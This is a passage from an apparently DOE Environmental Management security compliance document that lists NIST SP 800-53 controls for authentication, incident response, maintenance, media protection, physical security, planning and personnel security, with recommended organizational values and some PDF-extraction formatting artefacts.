IA-5 2 a - Authenticator Management
  NIST Control Requirement: The information system, for PKI-based authentication: Validates certifications by constructing and verifying a certification path to an accepted trust anchor including checking certificate status information;
IA-5 2 b - Authenticator Management
  NIST Control Requirement: The information system, for PKI-based authentication: Enforces authorized access to the corresponding private key;
IA-5 2 c - Authenticator Management
  NIST Control Requirement: The information system, for PKI-based authentication: Maps the authenticated identity to the account of the individual or group; and
IA-5 2 d - Authenticator Management
  NIST Control Requirement: The information system, for PKI-based authentication: Implements a local cache of revocation data to support path discovery and validation in case of inability to access revocation information via the network.
IA-5 3 - Authenticator Management
  NIST Control Requirement: The organization requires that the registration process to receive [Assignment: organization defined types of and/or specific authenticators] be conducted [Selection: in person; by a trusted third party] before [Assignment: organization-defined registration authority] with authorization by [Assignment: organization-defined personnel or roles].
  Recommended organizationally defined values: Two-factor authenticators and/or encryption keys
IA-5 11 - Authenticator Management
  NIST Control Requirement: The information system, for hardware token-based authentication, employs mechanisms that satisfy [Assignment: organization-defined token quality requirements].
IA-6 - Authenticator Feedback
  NIST Control Requirement: The information system obscures feedback of authentication information during the authentication process to protect the information from possible exploitation/use by unauthorized individuals.
IA-7 - Cryptographic Module Authentication
  NIST Control Requirement: The information system implements mechanisms for authentication to a cryptographic module that meet the requirements of applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance for such authentication.
IA-8 - Identification and Authentication (Non-Organizational Users)
  NIST Control Requirement: The information system uniquely identifies and authenticates non-organizational users (or processes acting on behalf of non-organizational users).
  EM Supplemental Guidance: Non-organizational users include all information system users other than organizational users explicitly covered by IA-2.
IA-8 1 - Identification and Authentication (Non-Organizational Users)
  NIST Control Requirement: The information system accepts and electronically verifies Personal Identity Verification (PIV) credentials from other federal agencies.
IA-8 2 - Identification and Authentication (Non-Organizational Users)
  NIST Control Requirement: The information system accepts only FICAM-approved third-party credentials
IA-8 3 - Identification and Authentication (Non-Organizational Users)
  NIST Control Requirement: The organization employs only FICAM-approved information system components in [Assignment: organization-defined information systems] to accept third-party credentials.
IA-8 4 - Identification and Authentication (Non-Organizational Users)
  NIST Control Requirement: The information system conforms to FICAM-issued profiles.
IR-1 0 a 1 - Incident Response Policy and Procedures
  NIST Control Requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: An incident response policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance;
  Recommended organizationally defined values: Security Staff and Administrative Staff
IR-1 0 a 2 - Incident Response Policy and Procedures
  NIST Control Requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the incident response policy and associated incident response controls; and
  Recommended organizationally defined values: Security Staff and Administrative Staff
IR-1 0 b 1 - Incident Response Policy and Procedures
  NIST Control Requirement: The organization: Reviews and updates the current: Incident response policy [Assignment: organization-defined frequency]; and
  Recommended organizationally defined values: Annually or any time there is a major change
IR-1 0 b 2 - Incident Response Policy and Procedures
  NIST Control Requirement: The organization: Reviews and updates the current: Incident response procedures [Assignment: organization-defined frequency].
  Recommended organizationally defined values: Annually or any time there is a major change
IR-2 0 a - Incident Response Training
  NIST Control Requirement: The organization provides incident response training to information system users consistent with assigned roles and responsibilities: Within [Assignment: organization-defined time period] of assuming an incident response role or responsibility;
  Recommended organizationally defined values: Six weeks
  EM Supplemental Guidance: Incident response training includes user training in the identification and reporting of suspicious activities, both from external and internal sources.
IR-2 0 b - Incident Response Training
  NIST Control Requirement: The organization provides incident response training to information system users consistent with assigned roles and responsibilities: When required by information system changes; and
IR-2 0 c - Incident Response Training
  NIST Control Requirement: The organization provides incident response training to information system users consistent with assigned roles and responsibilities: [Assignment: organization-defined frequency] thereafter.
  Recommended organizationally defined values: Annually
IR-3 0 - Incident Response Testing and Exercises
  NIST Control Requirement: The organization tests the incident response capability for the information system [Assignment: organization-defined frequency] using [Assignment: organization-defined tests] to determine the incident response effectiveness and documents the results.
  Recommended organizationally defined values: The site test exercises incident response scenarios at least annually; this will include detection, analysis, containment, eradication and recovery
IR-3 2 - Incident Response Testing and Exercises
  NIST Control Requirement: The organization coordinates incident response testing with organizational elements responsible for related plans.
IR-4 0 a - Incident Handling
  NIST Control Requirement: The organization: Implements an incident handling capability for security incidents that includes preparation, detection and analysis, containment, eradication, and recovery;
IR-4 0 b - Incident Handling
  NIST Control Requirement: The organization: Coordinates incident handling activities with contingency planning activities; and
IR-4 0 c - Incident Handling
  NIST Control Requirement: The organization: Incorporates lessons learned from ongoing incident handling activities into incident response procedures, training, and testing/exercises, and implements the resulting changes accordingly.
IR-4 1 - Incident Handling
  NIST Control Requirement: The organization employs automated mechanisms to support the incident handling process.
IR-5 0 - Incident Monitoring
  NIST Control Requirement: The organization tracks and documents information system security incidents
IR-6 0 a - Incident Reporting
  NIST Control Requirement: The organization: Requires personnel to report suspected security incidents to the organizational incident response capability within [Assignment: organization-defined time period]; and
  Recommended organizationally defined values: Immediately upon detection if the incident is thought to involve PII or two hours for moderate categorized systems for all other types of incidents
  EM Supplemental Guidance: EM requires that the EM CSPM and the EM-1 be notified when PII of 100 or more is affected or in the case of a release of classified information into the public domain.
IR-6 0 b - Incident Reporting
  NIST Control Requirement: The organization: Reports security incident information to [Assignment: organization-defined authorities].
  Recommended organizationally defined values: JC3
IR-6 1 - Incident Reporting
  NIST Control Requirement: The organization employs automated mechanisms to assist in the reporting of security incidents.
IR-7 0 - Incident Response Assistance
  NIST Control Requirement: The organization provides an incident response support resource, integral to the organizational incident response capability that offers advice and assistance to users of the information system for the handling and reporting of security incidents.
IR-7 1 - Incident Response Assistance
  NIST Control Requirement: The organization employs automated mechanisms to increase the availability of incident response related information and support.
IR-8 0 a 1 - Incident Response Plan
  NIST Control Requirement: The organization: Develops an incident response plan that: Provides the organization with a roadmap for implementing its incident response capability;
  EM Supplemental Guidance: It is important that organizations have a formal, focused, and coordinated approach to responding to incidents. The organization's mission, strategies, and goals for incident response help determine the structure of its incident response capability.
IR-8 0 a 2 - Incident Response Plan
  NIST Control Requirement: The organization: Develops an incident response plan that: Describes the structure and organization of the incident response capability;
IR-8 0 a 3 - Incident Response Plan
  NIST Control Requirement: The organization: Develops an incident response plan that: Provides a high-level approach for how the incident response capability fits into the overall organization;
IR-8 0 a 4 - Incident Response Plan
  NIST Control Requirement: The organization: Develops an incident response plan that: Meets the unique requirements of the organization, which relate to mission, size, structure, and functions;
IR-8 0 a 5 - Incident Response Plan
  NIST Control Requirement: The organization: Develops an incident response plan that: Defines reportable incidents;
IR-8 0 a 6Incident Response
Plan
The organization: Developsan incident response planthat: Provides metrics formeasuring the incidentresponse capability withinthe organization;
IR-8 0 a 7Incident Response
Plan
The organization: Developsan incident response planthat: Defines the resourcesand management supportneeded to effectivelymaintain and mature anincident response capability;and
IR-8 0 a 8Incident Response
Plan
The organization: Developsan incident response planthat: Is reviewed andapproved by [Assignment:organization-definedpersonnel or roles];
Incident response team
IR-8 0 bIncident Response
Plan
The organization:Distributes copies of theincident response plan to[Assignment: organization-defined incident responsepersonnel (identified byname and/or by role) andorganizational elements];
IR-8 0 cIncident Response
Plan
The organization: Reviewsthe incident response plan[Assignment: organization-defined frequency];
Annually
IR-8 0 dIncident Response
Plan
The organization: Updatesthe incident response plan toaddresssystem/organizationalchanges or problemsencountered during planimplementation, execution,or testing;
IR-8 0 eIncident Response
Plan
The organization:Communicates incidentresponse plan changes to[Assignment: organization-defined incident responsepersonnel (identified byname and/or by role) andorganizational elements];and
________________________________________________________________________
| IR-8 | 0 | f | Incident Response Plan | The organization: Protects the incident response plan from unauthorized disclosure and modification. | | |
| MA-1 | | a | Maintenance Policy and Procedures | The organization: a. Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A system maintenance policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and | Security Staff and Administrative Staff | |
| MA-1 | | a | Maintenance Policy and Procedures | The organization: a. Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the system maintenance policy and associated system maintenance controls; and | Security Staff and Administrative Staff | |
| MA-1 | | b | Maintenance Policy and Procedures | The organization: Reviews and updates the current: System maintenance policy [Assignment: organization-defined frequency]; and | Annually or any time there is a major change | |
| MA-1 | | b | Maintenance Policy and Procedures | The organization: Reviews and updates the current: System maintenance procedures [Assignment: organization-defined frequency]. | Annually or any time there is a major change | |
| MA-2 | | a | Controlled Maintenance | The organization schedules, performs, documents, and reviews records of maintenance and repairs on information system components in accordance with manufacturer or vendor specifications and/or organizational requirements; | | |
| MA-2 | | b | Controlled Maintenance | The organization approves and monitors all maintenance activities, whether performed on site or remotely and whether the equipment is serviced on site or removed to another location; | | |
| MA-2 | | c | Controlled Maintenance | The organization requires that [Assignment: organization-defined personnel or roles] explicitly approve the removal of the information system or system components from organizational facilities for off-site maintenance or repairs; | | |
| MA-2 | | d | Controlled Maintenance | The organization sanitizes equipment to remove all information from associated media prior to removal from organizational facilities for off-site maintenance or repairs; and | | |
| MA-2 | | e | Controlled Maintenance | The organization checks all potentially impacted security controls to verify that the controls are still functioning properly following maintenance or repair actions. | | |
| MA-2 | | f | Controlled Maintenance | The organization includes [Assignment: organization-defined maintenance-related information] in organizational maintenance records. | | |
| MA-3 | | | Maintenance Tools | The organization approves, controls, and monitors information system maintenance tools. | | The intent of this control is to address the security-related issues arising from the hardware and software brought into the information system specifically for diagnostic and repair actions (e.g., a hardware or software packet sniffer that is introduced for the purpose of a particular maintenance activity). |
| MA-3 | 1 | | Maintenance Tools | The organization inspects the maintenance tools carried into a facility by maintenance personnel for improper or unauthorized modifications. | | |
| MA-3 | 2 | | Maintenance Tools | The organization checks media containing diagnostic and test programs for malicious code before the media are used in the information system. | | |
| MA-4 | | a | Non-Local Maintenance | The organization approves and monitors non-local maintenance and diagnostic activities; | | Non-local maintenance and diagnostic activities are those activities conducted by individuals communicating through a network; either an external network (e.g., the Internet) or an internal network. |
| MA-4 | | b | Non-Local Maintenance | The organization allows the use of non-local maintenance and diagnostic tools only as consistent with organizational policy and documented in the security plan for the information system; | | |
| MA-4 | | c | Non-Local Maintenance | The organization employs strong authenticators in the establishment of nonlocal maintenance and diagnostic sessions; | | |
| MA-4 | | d | Non-Local Maintenance | The organization maintains records for non-local maintenance and diagnostic activities; and | | |
| MA-4 | | e | Non-Local Maintenance | The organization terminates session and network connections when non-local maintenance is completed. | | |
| MA-4 | 2 | | Non-Local Maintenance | The organization documents in the security plan for the information system, the policies and procedures for the establishment and use of nonlocal maintenance and diagnostic connections. | | |
| MA-5 | | a | Maintenance Personnel | The organization establishes a process for maintenance personnel authorization and maintains a list of authorized maintenance organizations or personnel; | | |
| MA-5 | | b | Maintenance Personnel | The organization ensures that non-escorted personnel performing maintenance on the information system have required access authorizations; and | | |
| MA-5 | | c | Maintenance Personnel | The organization designates organizational personnel with required access authorizations and technical competence to supervise the maintenance activities of personnel who do not possess the required access authorizations. | | |
| MA-6 | | | Timely Maintenance | The organization obtains maintenance support and/or spare parts for [Assignment: organization-defined information system components] within [Assignment: organization-defined time period] of failure. | | The organization specifies those information system components that, when not operational, result in increased risk to organizations, individuals, or the Nation because the security functionality intended by that component is not being provided. Security-critical components include, for example, firewalls, guards, gateways, intrusion detection systems, audit repositories, authentication servers, and intrusion prevention systems. |
| MP-1 | | a.1 | Media Protection Policy and Procedures | The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: a media protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and | Security Staff and Administrative Staff | |
| MP-1 | | a.2 | Media Protection Policy and Procedures | The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the media protection policy and associated media protection controls; and | Security Staff and Administrative Staff | |
| MP-1 | | b.1 | Media Protection Policy and Procedures | The organization reviews and updates the current: Media protection policy [Assignment: organization-defined frequency]; and | Annually or any time there is a major change | |
| MP-1 | | b.2 | Media Protection Policy and Procedures | The organization reviews and updates the current: Media protection procedures [Assignment: organization-defined frequency]. | Annually or any time there is a major change | |
| MP-2 | | | Media Access | The organization restricts access to [Assignment: organization-defined types of digital and/or non-digital media] to [Assignment: organization-defined personnel or roles]. | | Information system media includes both digital media (e.g., diskettes, magnetic tapes, external/removable hard drives, flash/thumb drives, compact disks, digital video disks) and non-digital media (e.g., paper, microfilm). This control also applies to mobile computing and communications devices with information storage capability (e.g., notebook/laptop computers, personal digital assistants, cellular telephones, digital cameras, and audio recording devices). Controlled unclassified information (e.g., Official Use Only, Personally Identifiable Information, Unclassified Controlled Nuclear Information (UCNI), Sensitive Security Information). Those individuals with defined business requirement. Group or other assigned access restrictions which are clearly documented. |
| MP-3 | | a | Media Marking | The organization marks information system media indicating the distribution limitations, handling caveats, and applicable security markings (if any) of the information; and | | |
| MP-3 | | b | Media Marking | The organization exempts [Assignment: organization-defined types of information system media] from marking as long as the media remain within [Assignment: organization-defined controlled areas] | | This applies to media that would remain in an operational component that is installed in a limited access area where the physical control of the assigned device is assigned and tracked to an individual in the DOE physically controlled space. |
| MP-4 | | a | Media Storage | The organization physically controls and securely stores [Assignment: organization-defined types of digital and/or non-digital media] within [Assignment: organization-defined controlled areas]; and | All digital and non-digital controlled unclassified information (e.g., backup tapes, external/removable hard drives, flash/thumb drives, compact discs, DVDs) | |
| MP-4 | | b | Media Storage | The organization protects information system media until the media are destroyed or sanitized using approved equipment, techniques, and procedures. | | |
| MP-5 | | a | Media Transport | The organization: Protects and controls [Assignment: organization-defined types of information system media] during transport outside of controlled areas using [Assignment: organization-defined security safeguards]; | All digital and non-digital controlled unclassified information (e.g., backup tapes, external/removable hard drives, flash/thumb drives, compact discs, DVDs) - using FIPS 140-2 | This control also applies to mobile computing and communications devices with information storage capability (e.g., notebook/laptop computers, personal digital assistants, cellular telephones, digital cameras, and audio recording devices) that are transported outside of controlled areas. |
| MP-5 | | b | Media Transport | The organization: Maintains accountability for information system media during transport outside of controlled areas; | | |
| MP-5 | | c | Media Transport | The organization: Documents activities associated with the transport of information system media; and | | |
| MP-5 | | d | Media Transport | The organization: Restricts the activities associated with the transport of information system media to authorized personnel. | | |
| MP-5 | 4 | | Media Transport | The information system implements cryptographic mechanisms to protect the confidentiality and integrity of information stored on digital media during transport outside of controlled areas. | | |
| MP-6 | | a | Media Sanitization | The organization: Sanitizes [Assignment: organization-defined information system media] prior to disposal, release out of organizational control, or release for reuse using [Assignment: organization-defined sanitization techniques and procedures] in accordance with applicable federal and organizational standards and policies; and | | This control applies to all media subject to disposal or reuse, whether or not considered removable. |
| MP-6 | | b | Media Sanitization | The organization: Employs sanitization mechanisms with the strength and integrity commensurate with the security category or classification of the information. | | As an example, all media used in NSS would be destroyed via a shredder and/or degaussing. |
| MP-7 | | | Media Use | The organization [Selection: restricts; prohibits] the use of [Assignment: organization-defined types of information system media] on [Assignment: organization-defined information systems or system components] using [Assignment: organization-defined security safeguards]. | | |
| MP-7 | 1 | | Media Use | The organization prohibits the use of portable storage devices in organizational information systems when such devices have no identifiable owner. | | |
| PE-1 | 0 | a.1 | Physical and Environmental Protection Policy and Procedures | The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A physical and environmental protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and | Security Staff and Administrative Staff | |
| PE-1 | 0 | a.2 | Physical and Environmental Protection Policy and Procedures | The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the physical and environmental protection policy and associated physical and environmental protection controls; and | Security Staff and Administrative Staff | |
| PE-1 | 0 | b.1 | Physical and Environmental Protection Policy and Procedures | The organization reviews and updates the current: Physical and environmental protection policy [Assignment: organization-defined frequency]; and | Annually or any time there is a major change | |
| PE-1 | 0 | b.2 | Physical and Environmental Protection Policy and Procedures | The organization reviews and updates the current: Physical and environmental protection procedures [Assignment: organization-defined frequency]. | Annually or any time there is a major change | |
| PE-2 | 0 | a | Physical Access Authorizations | The organization: Develops, approves, and maintains a list of individuals with authorized access to the facility where the information system resides; | | |
| PE-2 | 0 | b | Physical Access Authorizations | The organization: Issues authorization credentials for facility access; | | |
| PE-2 | 0 | c | Physical Access Authorizations | The organization: Reviews the access list detailing authorized facility access by individuals [Assignment: organization-defined frequency]; and | Every 6 months | |
| PE-2 | 0 | d | Physical Access Authorizations | The organization: Removes individuals from the facility access list when access is no longer required. | | |
| PE-3 | 0 | a.1 | Physical Access Control | The organization: Enforces physical access authorizations at [Assignment: organization-defined entry/exit points to the facility where the information system resides] by: Verifying individual access authorizations before granting access to the facility; and | | |
| PE-3 | 0 | a.2 | Physical Access Control | The organization: Enforces physical access authorizations at [Assignment: organization-defined entry/exit points to the facility where the information system resides] by: Controlling ingress/egress to the facility using [Selection (one or more): [Assignment: organization-defined physical access control systems/devices]; guards]; | | |
| PE-3 | 0 | b | Physical Access Control | The organization: Maintains physical access audit logs for [Assignment: organization-defined entry/exit points]; | | |
| PE-3 | 0 | c | Physical Access Control | The organization: Provides [Assignment: organization-defined security safeguards] to control access to areas within the facility officially designated as publicly accessible; | | |
| PE-3 | 0 | d | Physical Access Control | The organization: Escorts visitors and monitors visitor activity [Assignment: organization-defined circumstances requiring visitor escorts and monitoring]; | | |
| PE-3 | 0 | e | Physical Access Control | The organization: Secures keys, combinations, and other physical access devices; | | |
| PE-3 | 0 | f | Physical Access Control | The organization: Inventories [Assignment: organization-defined physical access devices] every [Assignment: organization-defined frequency]; and | Every 6 months | |
| PE-3 | 0 | g | Physical Access Control | The organization: Changes combinations and keys [Assignment: organization-defined frequency] and/or when keys are lost, combinations are compromised, or individuals are transferred or terminated. | Every 6 months for combinations. Key locks should be changed when an individual leaves. | |
| PE-4 | 0 | | Access Control for Transmission Medium | The organization controls physical access to [Assignment: organization-defined information system distribution and transmission lines] within organizational facilities using [Assignment: organization-defined security safeguards]. | | |
| PE-5 | 0 | | Access Control for Output Devices | The organization controls physical access to information system output devices to prevent unauthorized individuals from obtaining the output. | | |
| PE-6 | 0 | a | Monitoring Physical Access | The organization: Monitors physical access to the facility where the information system resides to detect and respond to physical security incidents; | | |
| PE-6 | 0 | b | Monitoring Physical Access | The organization: Reviews physical access logs [Assignment: organization-defined frequency] and upon occurrence of [Assignment: organization-defined events or potential indications of events]; and | Every 6 months | |
| PE-6 | 0 | c | Monitoring Physical Access | The organization: Coordinates results of reviews and investigations with the organizational incident response capability. | | |
| PE-6 | 1 | | Monitoring Physical Access | The organization monitors physical intrusion alarms and surveillance equipment. | | |
| PE-8 | 0 | a | Visitor Access Records | The organization maintains visitor access records to the facility where the information system resides for [Assignment: organization-defined time period]; and | | |
| PE-8 | 0 | b | Visitor Access Records | The organization reviews visitor access records [Assignment: organization-defined frequency]. | Every 6 months | |
| PE-9 | 0 | | Power Equipment and Power Cabling | The organization protects power equipment and power cabling for the information system from damage and destruction. | | |
| PE-10 | 0 | a | Emergency Shutoff | The organization provides the capability of shutting off power to the information system or individual system components in emergency situations; | | |
| PE-10 | 0 | b | Emergency Shutoff | The organization places emergency shutoff switches or devices in [Assignment: organization-defined location by information system or system component] to facilitate safe and easy access for personnel; and | A single room or environment within datacenters and other areas with a significant amount of IT resources | |
| PE-10 | 0 | c | Emergency Shutoff | The organization protects emergency power shutoff capability from unauthorized activation. | | |
| PE-11 | 0 | | Emergency Power | The organization provides a short-term uninterruptible power supply to facilitate [Selection (one or more): an orderly shutdown of the information system; transition of the information system to long-term alternate power] in the event of a primary power source loss. | | |
| PE-12 | 0 | | Emergency Lighting | The organization employs and maintains automatic emergency lighting for the information system that activates in the event of a power outage or disruption and that covers emergency exits and evacuation routes within the facility. | | For small equipment rooms, several home-style emergency lights available at most hardware stores are sufficient for emergency lighting. In large data centers, these would not be suitable. |
| PE-13 | 0 | | Fire Protection | The organization employs and maintains fire suppression and detection devices/systems for the information system that are supported by an independent energy source. | | |
| PE-13 | 3 | | Fire Protection | The organization employs an automatic fire suppression capability for the information system when the facility is not staffed on a continuous basis. | | |
| PE-14 | 0 | a | Temperature and Humidity Controls | The organization maintains temperature and humidity levels within the facility where the information system resides at [Assignment: organization-defined acceptable levels]; and | 68-77 degrees Fahrenheit, 45-55% | |
| PE-14 | 0 | b | Temperature and Humidity Controls | The organization monitors temperature and humidity levels [Assignment: organization-defined frequency]. | Daily | |
| PE-15 | 0 | | Water Damage Protection | The organization protects the information system from damage resulting from water leakage by providing master shutoff or isolation valves that are accessible, working properly, and known to key personnel. | | |
| PE-16 | 0 | | Delivery and Removal | The organization authorizes, monitors, and controls [Assignment: organization-defined types of information system components] entering and exiting the facility and maintains records of those items. | All telecommunications or IT related devices (can be over certain $ threshold) | |
| PE-17 | 0 | a | Alternate Work Site | The organization employs [Assignment: organization-defined security controls] at alternate work sites; | All management, operational, and technical information system security controls | |
| PE-17 | 0 | b | Alternate Work Site | The organization assesses as feasible, the effectiveness of security controls at alternate work sites; and | | |
| PE-17 | 0 | c | Alternate Work Site | The organization provides a means for employees to communicate with information security personnel in case of security incidents or problems. | | |
| PL-1 | 0 | a.1 | Security Planning Policy and Procedures | The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A security planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and | Security Staff and Administrative Staff | |
| PL-1 | 0 | a.2 | Security Planning Policy and Procedures | The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the security planning policy and associated security planning controls; and | Security Staff and Administrative Staff | |
| PL-1 | 0 | b.1 | Security Planning Policy and Procedures | The organization: Reviews and updates the current: Security planning policy [Assignment: organization-defined frequency]; and | Annually or any time there is a major change | |
| PL-1 | 0 | b.2 | Security Planning Policy and Procedures | The organization: Reviews and updates the current: Security planning procedures [Assignment: organization-defined frequency]. | Annually or any time there is a major change | |
| PL-2 | 0 | a.1 | System Security Plan | The organization: Develops a security plan for the information system that: Is consistent with the organization’s enterprise architecture; | | The EM eGovRPM repository must be used to create and maintain a security plan and to store any security related documentation. |
| PL-2 | 0 | a.2 | System Security Plan | The organization: Develops a security plan for the information system that: Explicitly defines the authorization boundary for the system; | | |
| PL-2 | 0 | a.3 | System Security Plan | The organization: Develops a security plan for the information system that: Describes the operational context of the information system in terms of missions and business processes; | | |
| PL-2 | 0 | a.4 | System Security Plan | The organization: Develops a security plan for the information system that: Provides the security categorization of the information system including supporting rationale; | | |
| PL-2 | 0 | a.5 | System Security Plan | The organization: Develops a security plan for the information system that: Describes the operational environment for the information system and relationships with or connections to other information systems; | | |
| PL-2 | 0 | a.6 | System Security Plan | The organization: Develops a security plan for the information system that: Provides an overview of the security requirements for the system; | | |
| PL-2 | 0 | a.7 | System Security Plan | The organization: Develops a security plan for the information system that: Identifies any relevant overlays, if applicable; | | |
| PL-2 | 0 | a.8 | System Security Plan | The organization: Develops a security plan for the information system that: Describes the security controls in place or planned for meeting those requirements including a rationale for the tailoring and supplementation decisions; and | | |
| PL-2 | 0 | a.9 | System Security Plan | The organization: Develops a security plan for the information system that: Is reviewed and approved by the authorizing official or designated representative prior to plan implementation; | | |
| PL-2 | 0 | b | System Security Plan | The organization distributes copies of the security plan and communicates subsequent changes to the plan to [Assignment: organization-defined personnel or roles]; | Security Staff, Administrative Staff, the AODR & the AO | |
| PL-2 | 0 | c | System Security Plan | The organization reviews the security plan for the information system [Assignment: organization-defined frequency]; | Annually | |
| PL-2 | 0 | d | System Security Plan | The organization updates the plan to address changes to the information system/environment of operation or problems identified during plan implementation or security control assessments; and | | |
| PL-2 | 0 | e | System Security Plan | The organization protects the security plan from unauthorized disclosure and modification. | | |
| PL-2 | 3 | | System Security Plan | The organization plans and coordinates security-related activities affecting the information system with [Assignment: organization-defined individuals or groups] before conducting such activities in order to reduce the impact on other organizational entities. | | |
| PL-4 | 0 | a | Rules of Behavior | The organization: Establishes and makes readily available to individuals requiring access to the information system, the rules that describe their responsibilities and expected behavior with regard to information and information system usage; | | |
| PL-4 | 0 | b | Rules of Behavior | The organization: Receives a signed acknowledgment from such individuals, indicating that they have read, understand, and agree to abide by the rules of behavior, before authorizing access to information and the information system; | | |
________________________________________________________________________DOE EM RMAIP
113 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PL-4 0 c Rules of Behavior
The organization: Reviewsand updates the rules ofbehavior [Assignment:organization-definedfrequency]; and
PL-4 0 d Rules of Behavior
The organization: Requiresindividuals who have signeda previous version of therules of behavior to read andresign when the rules ofbehavior arerevised/updated.
PL-4 1 Rules of Behavior
The organization includes inthe rules of behavior,explicit restrictions on theuse of socialmedia/networking sites andposting organizationalinformation on publicwebsites.
PL-8 0 a 1Information Security
Architecture
The organization: Developsan information securityarchitecture for theinformation system that:Describes the overallphilosophy, requirements,and approach to be takenwith regard to protecting theconfidentiality, integrity,and availability oforganizational information;
PL-8 0 a 2Information Security
Architecture
The organization: Developsan information securityarchitecture for theinformation system thatDescribes how theinformation securityarchitecture is integratedinto and supports theenterprise architecture; and
PL-8 0 a 3Information Security
Architecture
The organization: Developsan information securityarchitecture for theinformation system thatDescribes any informationsecurity assumptions about,and dependencies on,external services;
PL-8 0 b - Information Security Architecture
The organization: Reviews and updates the information security architecture [Assignment: organization-defined frequency] to reflect updates in the enterprise architecture; and
PL-8 0 c - Information Security Architecture
The organization: Ensures that planned information security architecture changes are reflected in the security plan, the security Concept of Operations (CONOPS), and organizational procurements/acquisitions.
PS-1 a 1 - Personnel Security Policy and Procedures
The organization: a. Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A personnel security policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
Recommended value: Security Staff and Administrative Staff
PS-1 a 2 - Personnel Security Policy and Procedures
The organization: a. Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the personnel security policy and associated personnel security controls; and
Recommended value: Security Staff and Administrative Staff
PS-1 b 1 - Personnel Security Policy and Procedures
The organization: Reviews and updates the current: Personnel security policy [Assignment: organization-defined frequency]; and
Recommended value: Annually or any time there is a major change
PS-1 b 2 - Personnel Security Policy and Procedures
The organization: Reviews and updates the current: Personnel security procedures [Assignment: organization-defined frequency].
Recommended value: Annually or any time there is a major change
PS-2 a - Position Categorization
The organization: Assigns a risk designation to all positions;
PS-2 b - Position Categorization
The organization: Establishes screening criteria for individuals filling those positions; and
PS-2 c - Position Categorization
The organization: Reviews and revises position risk designations [Assignment: organization-defined frequency].
Recommended value: Annually or when new positions are developed
PS-3 a - Personnel Screening
The organization: Screens individuals prior to authorizing access to the information system; and
PS-3 b - Personnel Screening
The organization: Rescreens individuals according to [Assignment: organization-defined list of conditions requiring rescreening and, where re-screening is so indicated, the frequency of such rescreening].
Recommended value: The risk categorization, but no less than every 60 months or any time the manager feels the individual's risk factors have changed, in accordance with HSPD-12 and HR
PS-4 a - Personnel Termination
The organization, upon termination of individual employment: Disables information system access within [Assignment: organization-defined time period];
PS-4 b - Personnel Termination
The organization, upon termination of individual employment: Terminates/revokes any authenticators/credentials associated with the individual;
PS-4 c - Personnel Termination
The organization, upon termination of individual employment: Conducts exit interviews that include a discussion of [Assignment: organization-defined information security topics];
PS-4 d - Personnel Termination
The organization, upon termination of individual employment: Retrieves all security-related organizational information system-related property;
PS-4 e - Personnel Termination
The organization, upon termination of individual employment: Retains access to organizational information and information systems formerly controlled by the terminated individual; and
PS-4 f - Personnel Termination
The organization, upon termination of individual employment: Notifies [Assignment: organization-defined personnel or roles] within [Assignment: organization-defined time period].
PS-5 a - Personnel Transfer
The organization: Reviews and confirms ongoing operational need for current logical and physical access authorizations to information systems/facilities when individuals are reassigned or transferred to other positions within the organization;
PS-5 b - Personnel Transfer
The organization: Initiates [Assignment: organization-defined transfer or reassignment actions] within [Assignment: organization-defined time period following the formal transfer action];
Recommended value: A review to ensure all individual access is modified appropriate to the new position within 30 days of a transfer action
PS-5 c - Personnel Transfer
The organization: Modifies access authorization as needed to correspond with any changes in operational need due to reassignment or transfer; and
PS-5 d - Personnel Transfer
The organization: Notifies [Assignment: organization-defined personnel or roles] within [Assignment: organization-defined time period].
PS-6 a - Access Agreements
The organization develops and documents access agreements for organizational information systems;
EM Supplemental Guidance: Access agreements include, for example, nondisclosure agreements, acceptable use agreements, rules of behavior, and conflict-of-interest agreements.
PS-6 b - Access Agreements
The organization reviews/updates the access agreements [Assignment: organization-defined frequency].
Recommended value: Annually
PS-6 c 1 - Access Agreements
The organization ensures that individuals requiring access to organizational information and information systems sign appropriate access agreements prior to being granted access; and
PS-6 c 2 - Access Agreements
The organization ensures that individuals requiring access to organizational information and information systems re-sign access agreements to maintain access to organizational information systems when access agreements have been updated or [Assignment: organization-defined frequency].
PS-7 a - Third-Party Personnel Security
The organization establishes personnel security requirements including security roles and responsibilities for third-party providers.
EM Supplemental Guidance: Third-party providers include, for example, service bureaus, contractors, and other organizations providing information system development, information technology services, outsourced applications, and network and security management.
PS-7 b - Third-Party Personnel Security
The organization requires third-party providers to comply with personnel security policies and procedures established by the organization.
PS-7 c - Third-Party Personnel Security
The organization documents personnel security requirements;
PS-7 d - Third-Party Personnel Security
The organization requires third-party providers to notify [Assignment: organization-defined personnel or roles] of any personnel transfers or terminations of third-party personnel who possess organizational credentials and/or badges, or who have information system privileges within [Assignment: organization-defined time period]; and
PS-7 e - Third-Party Personnel Security
The organization monitors provider compliance.
PS-8 a - Personnel Sanctions
The organization employs a formal sanctions process for personnel failing to comply with established information security policies and procedures; and
PS-8 b - Personnel Sanctions
The organization notifies [Assignment: organization-defined personnel or roles] within [Assignment: organization-defined time period] when a formal employee sanctions process is initiated, identifying the individual sanctioned and the reason for the sanction.
